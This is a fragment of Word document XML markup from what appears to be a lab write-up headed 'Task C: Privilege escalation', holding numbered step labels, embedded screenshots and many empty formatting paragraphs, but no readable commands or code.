        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37143BF1" w14:textId="1E4C67AA" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7431B9CC" w14:textId="471278CD" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB13DCB" w14:textId="6C9C6F1B" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="485F6142" w14:textId="0E2303F6" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705BA5D1" w14:textId="08EB2501" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF749A4" w14:textId="5CA77352" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFFF38C" w14:textId="5C2F04C5" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D6DB47" w14:textId="57A6E0DF" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380DC00D" w14:textId="028D81ED" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09BE145A" w14:textId="5C1F7D77" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1D149D" w14:textId="59ACA626" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6ED4D9" w14:textId="69E868E3" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140CC76D" w14:textId="494B56D8" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4F89C9" w14:textId="0865E4C0" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48054F79" w14:textId="0EC6B7DE" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78886A21" w14:textId="245C73D1" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D3EE46" w14:textId="2268A2A3" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23340B54" w14:textId="1EA34D44" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D7E292" w14:textId="6A1BF612" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DBBF445" w14:textId="3E96CBD7" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A16C99A" w14:textId="1740F243" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319ABB99" w14:textId="181BAC75" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B3D01A" w14:textId="25438037" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299A80BE" w14:textId="2749CCCC" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5542646E" w14:textId="6F13C43F" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="645CA17E" w14:textId="50AC3B4F" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A6C2C0C" w14:textId="22E2CD36" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E7460A" w14:textId="5076DB07" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9A6C9C" w14:textId="26AD6D24" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00362345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task C: Privilege escalation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6640CD5A" w14:textId="5F12D647" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00362345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B340CD" w14:textId="27C9DE9A" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00362345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066D839B" w14:textId="142A1D18" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00362345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAAEE4C" w14:textId="172EE3A5" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00362345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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D8DB1F3" wp14:editId="0AF1BAF8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>407324</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>39999</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3644265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="29" name="Picture 2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E6C80" w14:textId="21F75E00" w:rsidR="00362345" w:rsidRPr="00362345" w:rsidRDefault="00362345" w:rsidP="00362345">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0970A280" w14:textId="607F856F" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFFF0F9" w14:textId="7ECC39B3" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCE7F89" w14:textId="3BFFA02F" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B0F6D3" w14:textId="5EF83079" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A526727" w14:textId="2AB6A1E3" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F54E5D" w14:textId="6F668B9A" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7265EE" w14:textId="2A32F806" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF1D9CD" w14:textId="6160D072" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74895290" w14:textId="5AC33679" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25CA994F" w14:textId="55C26241" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000795ED" w14:textId="4CAA8D2F" w:rsidR="00362345" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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45F71346" wp14:editId="21256A7E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1735040</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-185779</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1807920" cy="428400"/>
                <wp:effectExtent l="25400" t="38100" r="46355" b="4191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807920" cy="42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CCB7E" id="Ink 31" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:135.9pt;margin-top:-15.35pt;width:143.75pt;height:35.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">
                <v:imagedata r:id="rId30" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBA7D1A" w14:textId="329DEE68" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E27D43A" w14:textId="1BB1337A" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052E737C" w14:textId="1A493AC7" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434B3C53" w14:textId="484E4B08" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3A048D" w14:textId="3520C80D" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4071B936" w14:textId="48DE0141" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B8442B" w14:textId="5284AEFD" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2D1A2C" w14:textId="01F3D304" w:rsidR="00362345" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206ECAA9" w14:textId="6FCFEA1D" w:rsidR="00021C77" w:rsidRDefault="00362345" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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C280A1A" wp14:editId="7DD988C1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>217202</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>169740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3644265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="30" name="Picture 30" descr="A picture containing text, screenshot, monitor,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screenshot, monitor, scree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24234" w14:textId="5D5D2ADA" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD5C148" w14:textId="3F64D2C1" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F609A9" w14:textId="1230BDC3" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DBF78A2" w14:textId="20937475" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5BD5E7" w14:textId="77777777" w:rsidR="00ED7C47" w:rsidRDefault="00ED7C47" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1626377F" w14:textId="5CA10758" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3774A3" w14:textId="287E20CC" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30DE77E9" w14:textId="3932CA2E" w:rsidR="00021C77" w:rsidRDefault="00021C77" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA48D87" w14:textId="337321AA" w:rsidR="00FA7F33" w:rsidRDefault="00FA7F33" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DF51F2" w14:textId="2C578CED" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C63C09" w14:textId="10F9FA3E" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6101CF40" w14:textId="1D78A2F8" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3810B9F8" w14:textId="74BB2992" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B36B502" w14:textId="0CCAE805" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F33B692" w14:textId="5DEFE610" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5759EAA6" w14:textId="2F8BBF4B" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3663AF" w14:textId="049AF656" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E8F8D7" w14:textId="4F9F2167" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D14955" w14:textId="45F6FE59" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F886636" w14:textId="1EC60334" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212E09F1" w14:textId="7E4016D9" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB1E1F" w14:textId="5B7F6493" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41424906" w14:textId="7BB97ACA" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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E59C6B3" wp14:editId="10C4973C">
            <wp:extent cx="6097509" cy="3738633"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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compute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195" cy="37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8903F" w14:textId="7EB273E9" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F15A63C" w14:textId="1C97178D" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6F4833" w14:textId="2731AD69" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D669BD" w14:textId="31AE7F75" w:rsidR="00823FAF" w:rsidRDefault="00823FAF" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E5C6BCC" w14:textId="0909C12E" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5644B2B7" w14:textId="2488E861" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3347992C" w14:textId="5CCBEED8" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1696C7B6" w14:textId="31785288" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7002F4D5" w14:textId="3C778FE2" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D7985C" w14:textId="56FCD14B" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF61C36" w14:textId="6BA52805" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39FD30F1" w14:textId="414B6165" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E4435A" w14:textId="66F87722" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FF5054" w14:textId="31B9A5D2" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1B3411" w14:textId="40A954A8" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B217AC3" w14:textId="0E6F5A7E" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60EF4A78" w14:textId="5708CE5C" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E1876D" w14:textId="72151891" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5C66D1" w14:textId="29E12862" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD703E1" w14:textId="7CBCA521" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C17CD62" w14:textId="682F261B" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D5BD3C" w14:textId="69C9A86C" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784F1A5D" w14:textId="0DB3478B" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CC4663" w14:textId="5798E4FE" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95B93F" w14:textId="4DF0589D" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188457C1" w14:textId="28273CFD" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045B8065" w14:textId="45B319FE" w:rsidR="00722088" w:rsidRDefault="00722088" w:rsidP="00FA7F33">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/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504D048E" wp14:editId="74B5162B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1647920</wp:posOffset>
                </wp:positionH>
